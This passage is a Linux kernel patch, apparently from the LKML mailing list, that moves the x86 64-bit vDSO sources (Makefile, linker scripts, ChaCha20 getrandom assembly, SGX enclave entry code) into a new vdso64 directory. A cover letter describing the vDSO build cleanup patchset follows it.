@@ -1,3 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#include "fake_32bit_build.h"
-#include "../vgetcpu.c"
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/Makefile b/arch/x86/entry/vdso/vdso64/Makefile
new file mode 100644
index 0000000..bfffaf1
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/Makefile
@@ -0,0 +1,46 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 64-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 64
+vdsos-$(CONFIG_X86_X32_ABI) += x32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += vgetrandom.o vgetrandom-chacha.o
+vobjs-$(CONFIG_X86_SGX) += vsgx.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO64 -m64 -mcmodel=small
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+#
+# X32 processes use x32 vDSO to access 64bit kernel data.
+#
+# Build x32 vDSO image:
+# 1. Compile x32 vDSO as 64bit.
+# 2. Convert object files to x32.
+# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
+# so that it can reach 64bit address space with 64bit pointers.
+#
+
+# Convert 64bit object file to x32 for x32 vDSO.
+quiet_cmd_x32 = X32 $@
+ cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
+
+$(obj)/%-x32.o: $(obj)/%.o FORCE
+ $(call if_changed,x32)
+
+vobjsx32 = $(patsubst %.o,%-x32.o,$(vobjs))
+targets += $(patsubst %.o,%-x32.o,$(vobjs-y))
+
+# Linker options for the vdso
+VDSO_LDFLAGS_64 := -m elf_x86_64 -soname linux-vdso.so.1 -z max-page-size=4096
+VDSO_LDFLAGS_x32 := $(subst elf_x86_64,elf32_x86_64,$(VDSO_LDFLAGS_64))
+
+$(obj)/vdso64.so.dbg: $(vobjs)
+$(obj)/vdsox32.so.dbg: $(vobjsx32)
diff --git a/arch/x86/entry/vdso/vdso64/note.S b/arch/x86/entry/vdso/vdso64/note.S
new file mode 100644
index 0000000..62d8aa5
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/note.S
@@ -0,0 +1 @@
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso64/vclock_gettime.c b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
new file mode 100644
index 0000000..1481f00
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
@@ -0,0 +1 @@
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso64/vdso64.lds.S b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
new file mode 100644
index 0000000..5ce3f2b
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
@@ -0,0 +1,37 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Linker script for 64-bit vDSO.
+ * We #include the file to define the layout details.
+ *
+ * This file defines the version script giving the user-exported symbols in
+ * the DSO.
+ */
+
+#define BUILD_VDSO64
+
+#include "common/vdso-layout.lds.S"
+
+/*
+ * This controls what userland symbols we export from the vDSO.
+ */
+VERSION {
+ LINUX_2.6 {
+ global:
+ clock_gettime;
+ __vdso_clock_gettime;
+ gettimeofday;
+ __vdso_gettimeofday;
+ getcpu;
+ __vdso_getcpu;
+ time;
+ __vdso_time;
+ clock_getres;
+ __vdso_clock_getres;
+#ifdef CONFIG_X86_SGX
+ __vdso_sgx_enter_enclave;
+#endif
+ getrandom;
+ __vdso_getrandom;
+ local: *;
+ };
+}
diff --git a/arch/x86/entry/vdso/vdso64/vdsox32.lds.S b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
new file mode 100644
index 0000000..3dbd20c
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
@@ -0,0 +1,27 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Linker script for x32 vDSO.
+ * We #include the file to define the layout details.
+ *
+ * This file defines the version script giving the user-exported symbols in
+ * the DSO.
+ */
+
+#define BUILD_VDSOX32
+
+#include "common/vdso-layout.lds.S"
+
+/*
+ * This controls what userland symbols we export from the vDSO.
+ */
+VERSION {
+ LINUX_2.6 {
+ global:
+ __vdso_clock_gettime;
+ __vdso_gettimeofday;
+ __vdso_getcpu;
+ __vdso_time;
+ __vdso_clock_getres;
+ local: *;
+ };
+}
diff --git a/arch/x86/entry/vdso/vdso64/vgetcpu.c b/arch/x86/entry/vdso/vdso64/vgetcpu.c
new file mode 100644
index 0000000..00cc832
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetcpu.c
@@ -0,0 +1 @@
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
new file mode 100644
index 0000000..bcba563
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
@@ -0,0 +1,178 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+ */
+
+#include <linux/linkage.h>
+#include <asm/frame.h>
+
+.section .rodata, "a"
+.align 16
+CONSTANTS: .octa 0x6b20657479622d323320646e61707865
+.text
+
+/*
+ * Very basic SSE2 implementation of ChaCha20. Produces a given positive number
+ * of blocks of output with a nonce of 0, taking an input key and 8-byte
+ * counter. Importantly does not spill to the stack. Its arguments are:
+ *
+ * rdi: output bytes
+ * rsi: 32-byte key input
+ * rdx: 8-byte counter input/output
+ * rcx: number of 64-byte blocks to write to output
+ */
+SYM_FUNC_START(__arch_chacha20_blocks_nostack)
+
+.set output, %rdi
+.set key, %rsi
+.set counter, %rdx
+.set nblocks, %rcx
+.set i, %al
+/* xmm registers are *not* callee-save. */
+.set temp, %xmm0
+.set state0, %xmm1
+.set state1, %xmm2
+.set state2, %xmm3
+.set state3, %xmm4
+.set copy0, %xmm5
+.set copy1, %xmm6
+.set copy2, %xmm7
+.set copy3, %xmm8
+.set one, %xmm9
+
+ /* copy0 = "expand 32-byte k" */
+ movaps CONSTANTS(%rip),copy0
+ /* copy1,copy2 = key */
+ movups 0x00(key),copy1
+ movups 0x10(key),copy2
+ /* copy3 = counter || zero nonce */
+ movq 0x00(counter),copy3
+ /* one = 1 || 0 */
+ movq $1,%rax
+ movq %rax,one
+
+.Lblock:
+ /* state0,state1,state2,state3 = copy0,copy1,copy2,copy3 */
+ movdqa copy0,state0
+ movdqa copy1,state1
+ movdqa copy2,state2
+ movdqa copy3,state3
+
+ movb $10,i
+.Lpermute:
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $16,temp
+ psrld $16,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $12,temp
+ psrld $20,state1
+ por temp,state1
+
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $8,temp
+ psrld $24,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $7,temp
+ psrld $25,state1
+ por temp,state1
+
+ /* state1[0,1,2,3] = state1[1,2,3,0] */
+ pshufd $0x39,state1,state1
+ /* state2[0,1,2,3] = state2[2,3,0,1] */
+ pshufd $0x4e,state2,state2
+ /* state3[0,1,2,3] = state3[3,0,1,2] */
+ pshufd $0x93,state3,state3
+
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $16,temp
+ psrld $16,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $12,temp
+ psrld $20,state1
+ por temp,state1
+
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $8,temp
+ psrld $24,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $7,temp
+ psrld $25,state1
+ por temp,state1
+
+ /* state1[0,1,2,3] = state1[3,0,1,2] */
+ pshufd $0x93,state1,state1
+ /* state2[0,1,2,3] = state2[2,3,0,1] */
+ pshufd $0x4e,state2,state2
+ /* state3[0,1,2,3] = state3[1,2,3,0] */
+ pshufd $0x39,state3,state3
+
+ decb i
+ jnz .Lpermute
+
+ /* output0 = state0 + copy0 */
+ paddd copy0,state0
+ movups state0,0x00(output)
+ /* output1 = state1 + copy1 */
+ paddd copy1,state1
+ movups state1,0x10(output)
+ /* output2 = state2 + copy2 */
+ paddd copy2,state2
+ movups state2,0x20(output)
+ /* output3 = state3 + copy3 */
+ paddd copy3,state3
+ movups state3,0x30(output)
+
+ /* ++copy3.counter */
+ paddq one,copy3
+
+ /* output += 64, --nblocks */
+ addq $64,output
+ decq nblocks
+ jnz .Lblock
+
+ /* counter = copy3.counter */
+ movq copy3,0x00(counter)
+
+ /* Zero out the potentially sensitive regs, in case nothing uses these again. */
+ pxor state0,state0
+ pxor state1,state1
+ pxor state2,state2
+ pxor state3,state3
+ pxor copy1,copy1
+ pxor copy2,copy2
+ pxor temp,temp
+
+ ret
+SYM_FUNC_END(__arch_chacha20_blocks_nostack)
diff --git a/arch/x86/entry/vdso/vdso64/vgetrandom.c b/arch/x86/entry/vdso/vdso64/vgetrandom.c
new file mode 100644
index 0000000..6a95d36
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom.c
@@ -0,0 +1,15 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+ */
+#include <linux/types.h>
+
+#include "lib/vdso/getrandom.c"
+
+ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
+{
+ return __cvdso_getrandom(buffer, len, flags, opaque_state, opaque_len);
+}
+
+ssize_t getrandom(void *, size_t, unsigned int, void *, size_t)
+ __attribute__((weak, alias("__vdso_getrandom")));
diff --git a/arch/x86/entry/vdso/vdso64/vsgx.S b/arch/x86/entry/vdso/vdso64/vsgx.S
new file mode 100644
index 0000000..37a3d4c
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vsgx.S
@@ -0,0 +1,150 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+
+#include <linux/linkage.h>
+#include <asm/errno.h>
+#include <asm/enclu.h>
+
+#include "extable.h"
+
+/* Relative to %rbp. */
+#define SGX_ENCLAVE_OFFSET_OF_RUN 16
+
+/* The offsets relative to struct sgx_enclave_run. */
+#define SGX_ENCLAVE_RUN_TCS 0
+#define SGX_ENCLAVE_RUN_LEAF 8
+#define SGX_ENCLAVE_RUN_EXCEPTION_VECTOR 12
+#define SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE 14
+#define SGX_ENCLAVE_RUN_EXCEPTION_ADDR 16
+#define SGX_ENCLAVE_RUN_USER_HANDLER 24
+#define SGX_ENCLAVE_RUN_USER_DATA 32 /* not used */
+#define SGX_ENCLAVE_RUN_RESERVED_START 40
+#define SGX_ENCLAVE_RUN_RESERVED_END 256
+
+.code64
+.section .text, "ax"
+
+SYM_FUNC_START(__vdso_sgx_enter_enclave)
+ /* Prolog */
+ .cfi_startproc
+ push %rbp
+ .cfi_adjust_cfa_offset 8
+ .cfi_rel_offset %rbp, 0
+ mov %rsp, %rbp
+ .cfi_def_cfa_register %rbp
+ push %rbx
+ .cfi_rel_offset %rbx, -8
+
+ mov %ecx, %eax
+.Lenter_enclave:
+ /* EENTER <= function <= ERESUME */
+ cmp $EENTER, %eax
+ jb .Linvalid_input
+ cmp $ERESUME, %eax
+ ja .Linvalid_input
+
+ mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rcx
+
+ /* Validate that the reserved area contains only zeros. */
+ mov $SGX_ENCLAVE_RUN_RESERVED_START, %rbx
+1:
+ cmpq $0, (%rcx, %rbx)
+ jne .Linvalid_input
+ add $8, %rbx
+ cmpq $SGX_ENCLAVE_RUN_RESERVED_END, %rbx
+ jne 1b
+
+ /* Load TCS and AEP */
+ mov SGX_ENCLAVE_RUN_TCS(%rcx), %rbx
+ lea .Lasync_exit_pointer(%rip), %rcx
+
+ /* Single ENCLU serving as both EENTER and AEP (ERESUME) */
+.Lasync_exit_pointer:
+.Lenclu_eenter_eresume:
+ enclu
+
+ /* EEXIT jumps here unless the enclave is doing something fancy. */
+ mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
+
+ /* Set exit_reason. */
+ movl $EEXIT, SGX_ENCLAVE_RUN_LEAF(%rbx)
+
+ /* Invoke userspace's exit handler if one was provided. */
+.Lhandle_exit:
+ cmpq $0, SGX_ENCLAVE_RUN_USER_HANDLER(%rbx)
+ jne .Linvoke_userspace_handler
+
+ /* Success, in the sense that ENCLU was attempted. */
+ xor %eax, %eax
+
+.Lout:
+ pop %rbx
+ leave
+ .cfi_def_cfa %rsp, 8
+ RET
+
+ /* The out-of-line code runs with the pre-leave stack frame. */
+ .cfi_def_cfa %rbp, 16
+
+.Linvalid_input:
+ mov $(-EINVAL), %eax
+ jmp .Lout
+
+.Lhandle_exception:
+ mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
+
+ /* Set the exception info. */
+ mov %eax, (SGX_ENCLAVE_RUN_LEAF)(%rbx)
+ mov %di, (SGX_ENCLAVE_RUN_EXCEPTION_VECTOR)(%rbx)
+ mov %si, (SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE)(%rbx)
+ mov %rdx, (SGX_ENCLAVE_RUN_EXCEPTION_ADDR)(%rbx)
+ jmp .Lhandle_exit
+
+.Linvoke_userspace_handler:
+ /* Pass the untrusted RSP (at exit) to the callback via %rcx. */
+ mov %rsp, %rcx
+
+ /* Save struct sgx_enclave_exception %rbx is about to be clobbered. */
+ mov %rbx, %rax
+
+ /* Save the untrusted RSP offset in %rbx (non-volatile register). */
+ mov %rsp, %rbx
+ and $0xf, %rbx
+
+ /*
+ * Align stack per x86_64 ABI. Note, %rsp needs to be 16-byte aligned
+ * _after_ pushing the parameters on the stack, hence the bonus push.
+ */
+ and $-0x10, %rsp
+ push %rax
+
+ /* Push struct sgx_enclave_exception as a param to the callback. */
+ push %rax
+
+ /* Clear RFLAGS.DF per x86_64 ABI */
+ cld
+
+ /*
+ * Load the callback pointer to %rax and lfence for LVI (load value
+ * injection) protection before making the call.
+ */
+ mov SGX_ENCLAVE_RUN_USER_HANDLER(%rax), %rax
+ lfence
+ call *%rax
+
+ /* Undo the post-exit %rsp adjustment. */
+ lea 0x10(%rsp, %rbx), %rsp
+
+ /*
+ * If the return from callback is zero or negative, return immediately,
+ * else re-execute ENCLU with the positive return value interpreted as
+ * the requested ENCLU function.
+ */
+ cmp $0, %eax
+ jle .Lout
+ jmp .Lenter_enclave
+
+ .cfi_endproc
+
+_ASM_VDSO_EXTABLE_HANDLE(.Lenclu_eenter_eresume, .Lhandle_exception)
+
+SYM_FUNC_END(__vdso_sgx_enter_enclave)
diff --git a/arch/x86/entry/vdso/vdsox32.lds.S b/arch/x86/entry/vdso/vdsox32.lds.S
deleted file mode 100644
index 16a8050..0000000
--- a/arch/x86/entry/vdso/vdsox32.lds.S
+++ /dev/null
@@ -1,27 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * Linker script for x32 vDSO.
- * We #include the file to define the layout details.
- *
- * This file defines the version script giving the user-exported symbols in
- * the DSO.
- */
-
-#define BUILD_VDSOX32
-
-#include "vdso-layout.lds.S"
-
-/*
- * This controls what userland symbols we export from the vDSO.
- */
-VERSION {
- LINUX_2.6 {
- global:
- __vdso_clock_gettime;
- __vdso_gettimeofday;
- __vdso_getcpu;
- __vdso_time;
- __vdso_clock_getres;
- local: *;
- };
-}
diff --git a/arch/x86/entry/vdso/vgetcpu.c b/arch/x86/entry/vdso/vgetcpu.c
deleted file mode 100644
index e464030..0000000
--- a/arch/x86/entry/vdso/vgetcpu.c
+++ /dev/null
@@ -1,22 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * Copyright 2006 Andi Kleen, SUSE Labs.
- *
- * Fast user context implementation of getcpu()
- */
-
-#include <linux/kernel.h>
-#include <linux/getcpu.h>
-#include <asm/segment.h>
-#include <vdso/processor.h>
-
-notrace long
-__vdso_getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *unused)
-{
- vdso_read_cpunode(cpu, node);
-
- return 0;
-}
-
-long getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *tcache)
- __attribute__((weak, alias("__vdso_getcpu")));
diff --git a/arch/x86/entry/vdso/vgetrandom-chacha.S b/arch/x86/entry/vdso/vgetrandom-chacha.S
deleted file mode 100644
index bcba563..0000000
--- a/arch/x86/entry/vdso/vgetrandom-chacha.S
+++ /dev/null
@@ -1,178 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0
-/*
- * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
- */
-
-#include <linux/linkage.h>
-#include <asm/frame.h>
-
-.section .rodata, "a"
-.align 16
-CONSTANTS: .octa 0x6b20657479622d323320646e61707865
-.text
-
-/*
- * Very basic SSE2 implementation of ChaCha20. Produces a given positive number
- * of blocks of output with a nonce of 0, taking an input key and 8-byte
- * counter. Importantly does not spill to the stack. Its arguments are:
- *
- * rdi: output bytes
- * rsi: 32-byte key input
- * rdx: 8-byte counter input/output
- * rcx: number of 64-byte blocks to write to output
- */
-SYM_FUNC_START(__arch_chacha20_blocks_nostack)
-
-.set output, %rdi
-.set key, %rsi
-.set counter, %rdx
-.set nblocks, %rcx
-.set i, %al
-/* xmm registers are *not* callee-save. */
-.set temp, %xmm0
-.set state0, %xmm1
-.set state1, %xmm2
-.set state2, %xmm3
-.set state3, %xmm4
-.set copy0, %xmm5
-.set copy1, %xmm6
-.set copy2, %xmm7
-.set copy3, %xmm8
-.set one, %xmm9
-
- /* copy0 = "expand 32-byte k" */
- movaps CONSTANTS(%rip),copy0
- /* copy1,copy2 = key */
- movups 0x00(key),copy1
- movups 0x10(key),copy2
- /* copy3 = counter || zero nonce */
- movq 0x00(counter),copy3
- /* one = 1 || 0 */
- movq $1,%rax
- movq %rax,one
-
-.Lblock:
- /* state0,state1,state2,state3 = copy0,copy1,copy2,copy3 */
- movdqa copy0,state0
- movdqa copy1,state1
- movdqa copy2,state2
- movdqa copy3,state3
-
- movb $10,i
-.Lpermute:
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $16,temp
- psrld $16,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $12,temp
- psrld $20,state1
- por temp,state1
-
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $8,temp
- psrld $24,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $7,temp
- psrld $25,state1
- por temp,state1
-
- /* state1[0,1,2,3] = state1[1,2,3,0] */
- pshufd $0x39,state1,state1
- /* state2[0,1,2,3] = state2[2,3,0,1] */
- pshufd $0x4e,state2,state2
- /* state3[0,1,2,3] = state3[3,0,1,2] */
- pshufd $0x93,state3,state3
-
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $16,temp
- psrld $16,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $12,temp
- psrld $20,state1
- por temp,state1
-
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $8,temp
- psrld $24,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $7,temp
- psrld $25,state1
- por temp,state1
-
- /* state1[0,1,2,3] = state1[3,0,1,2] */
- pshufd $0x93,state1,state1
- /* state2[0,1,2,3] = state2[2,3,0,1] */
- pshufd $0x4e,state2,state2
- /* state3[0,1,2,3] = state3[1,2,3,0] */
- pshufd $0x39,state3,state3
-
- decb i
- jnz .Lpermute
-
- /* output0 = state0 + copy0 */
- paddd copy0,state0
- movups state0,0x00(output)
- /* output1 = state1 + copy1 */
- paddd copy1,state1
- movups state1,0x10(output)
- /* output2 = state2 + copy2 */
- paddd copy2,state2
- movups state2,0x20(output)
- /* output3 = state3 + copy3 */
- paddd copy3,state3
- movups state3,0x30(output)
-
- /* ++copy3.counter */
- paddq one,copy3
-
- /* output += 64, --nblocks */
- addq $64,output
- decq nblocks
- jnz .Lblock
-
- /* counter = copy3.counter */
- movq copy3,0x00(counter)
-
- /* Zero out the potentially sensitive regs, in case nothing uses these again. */
- pxor state0,state0
- pxor state1,state1
- pxor state2,state2
- pxor state3,state3
- pxor copy1,copy1
- pxor copy2,copy2
- pxor temp,temp
-
- ret
-SYM_FUNC_END(__arch_chacha20_blocks_nostack)
diff --git a/arch/x86/entry/vdso/vgetrandom.c b/arch/x86/entry/vdso/vgetrandom.c
deleted file mode 100644
index 430862b..0000000
--- a/arch/x86/entry/vdso/vgetrandom.c
+++ /dev/null
@@ -1,15 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
- */
-#include <linux/types.h>
-
-#include "../../../../lib/vdso/getrandom.c"
-
-ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
-{
- return __cvdso_getrandom(buffer, len, flags, opaque_state, opaque_len);
-}
-
-ssize_t getrandom(void *, size_t, unsigned int, void *, size_t)
- __attribute__((weak, alias("__vdso_getrandom")));
diff --git a/arch/x86/entry/vdso/vsgx.S b/arch/x86/entry/vdso/vsgx.S
deleted file mode 100644
index 37a3d4c..0000000
--- a/arch/x86/entry/vdso/vsgx.S
+++ /dev/null
@@ -1,150 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-
-#include <linux/linkage.h>
-#include <asm/errno.h>
-#include <asm/enclu.h>
-
-#include "extable.h"
-
-/* Relative to %rbp. */
-#define SGX_ENCLAVE_OFFSET_OF_RUN 16
-
-/* The offsets relative to struct sgx_enclave_run. */
-#define SGX_ENCLAVE_RUN_TCS 0
-#define SGX_ENCLAVE_RUN_LEAF 8
-#define SGX_ENCLAVE_RUN_EXCEPTION_VECTOR 12
-#define SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE 14
-#define SGX_ENCLAVE_RUN_EXCEPTION_ADDR 16
-#define SGX_ENCLAVE_RUN_USER_HANDLER 24
-#define SGX_ENCLAVE_RUN_USER_DATA 32 /* not used */
-#define SGX_ENCLAVE_RUN_RESERVED_START 40
-#define SGX_ENCLAVE_RUN_RESERVED_END 256
-
-.code64
-.section .text, "ax"
-
-SYM_FUNC_START(__vdso_sgx_enter_enclave)
- /* Prolog */
- .cfi_startproc
- push %rbp
- .cfi_adjust_cfa_offset 8
- .cfi_rel_offset %rbp, 0
- mov %rsp, %rbp
- .cfi_def_cfa_register %rbp
- push %rbx
- .cfi_rel_offset %rbx, -8
-
- mov %ecx, %eax
-.Lenter_enclave:
- /* EENTER <= function <= ERESUME */
- cmp $EENTER, %eax
- jb .Linvalid_input
- cmp $ERESUME, %eax
- ja .Linvalid_input
-
- mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rcx
-
- /* Validate that the reserved area contains only zeros. */
- mov $SGX_ENCLAVE_RUN_RESERVED_START, %rbx
-1:
- cmpq $0, (%rcx, %rbx)
- jne .Linvalid_input
- add $8, %rbx
- cmpq $SGX_ENCLAVE_RUN_RESERVED_END, %rbx
- jne 1b
-
- /* Load TCS and AEP */
- mov SGX_ENCLAVE_RUN_TCS(%rcx), %rbx
- lea .Lasync_exit_pointer(%rip), %rcx
-
- /* Single ENCLU serving as both EENTER and AEP (ERESUME) */
-.Lasync_exit_pointer:
-.Lenclu_eenter_eresume:
- enclu
-
- /* EEXIT jumps here unless the enclave is doing something fancy. */
- mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
-
- /* Set exit_reason. */
- movl $EEXIT, SGX_ENCLAVE_RUN_LEAF(%rbx)
-
- /* Invoke userspace's exit handler if one was provided. */
-.Lhandle_exit:
- cmpq $0, SGX_ENCLAVE_RUN_USER_HANDLER(%rbx)
- jne .Linvoke_userspace_handler
-
- /* Success, in the sense that ENCLU was attempted. */
- xor %eax, %eax
-
-.Lout:
- pop %rbx
- leave
- .cfi_def_cfa %rsp, 8
- RET
-
- /* The out-of-line code runs with the pre-leave stack frame. */
- .cfi_def_cfa %rbp, 16
-
-.Linvalid_input:
- mov $(-EINVAL), %eax
- jmp .Lout
-
-.Lhandle_exception:
- mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
-
- /* Set the exception info. */
- mov %eax, (SGX_ENCLAVE_RUN_LEAF)(%rbx)
- mov %di, (SGX_ENCLAVE_RUN_EXCEPTION_VECTOR)(%rbx)
- mov %si, (SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE)(%rbx)
- mov %rdx, (SGX_ENCLAVE_RUN_EXCEPTION_ADDR)(%rbx)
- jmp .Lhandle_exit
-
-.Linvoke_userspace_handler:
- /* Pass the untrusted RSP (at exit) to the callback via %rcx. */
- mov %rsp, %rcx
-
- /* Save struct sgx_enclave_exception %rbx is about to be clobbered. */
- mov %rbx, %rax
-
- /* Save the untrusted RSP offset in %rbx (non-volatile register). */
- mov %rsp, %rbx
- and $0xf, %rbx
-
- /*
- * Align stack per x86_64 ABI. Note, %rsp needs to be 16-byte aligned
- * _after_ pushing the parameters on the stack, hence the bonus push.
- */
- and $-0x10, %rsp
- push %rax
-
- /* Push struct sgx_enclave_exception as a param to the callback. */
- push %rax
-
- /* Clear RFLAGS.DF per x86_64 ABI */
- cld
-
- /*
- * Load the callback pointer to %rax and lfence for LVI (load value
- * injection) protection before making the call.
- */
- mov SGX_ENCLAVE_RUN_USER_HANDLER(%rax), %rax
- lfence
- call *%rax
-
- /* Undo the post-exit %rsp adjustment. */
- lea 0x10(%rsp, %rbx), %rsp
-
- /*
- * If the return from callback is zero or negative, return immediately,
- * else re-execute ENCLU with the positive return value interpreted as
- * the requested ENCLU function.
- */
- cmp $0, %eax
- jle .Lout
- jmp .Lenter_enclave
-
- .cfi_endproc
-
-_ASM_VDSO_EXTABLE_HANDLE(.Lenclu_eenter_eresume, .Lhandle_exception)
-
-SYM_FUNC_END(__vdso_sgx_enter_enclave)
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:01:23 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
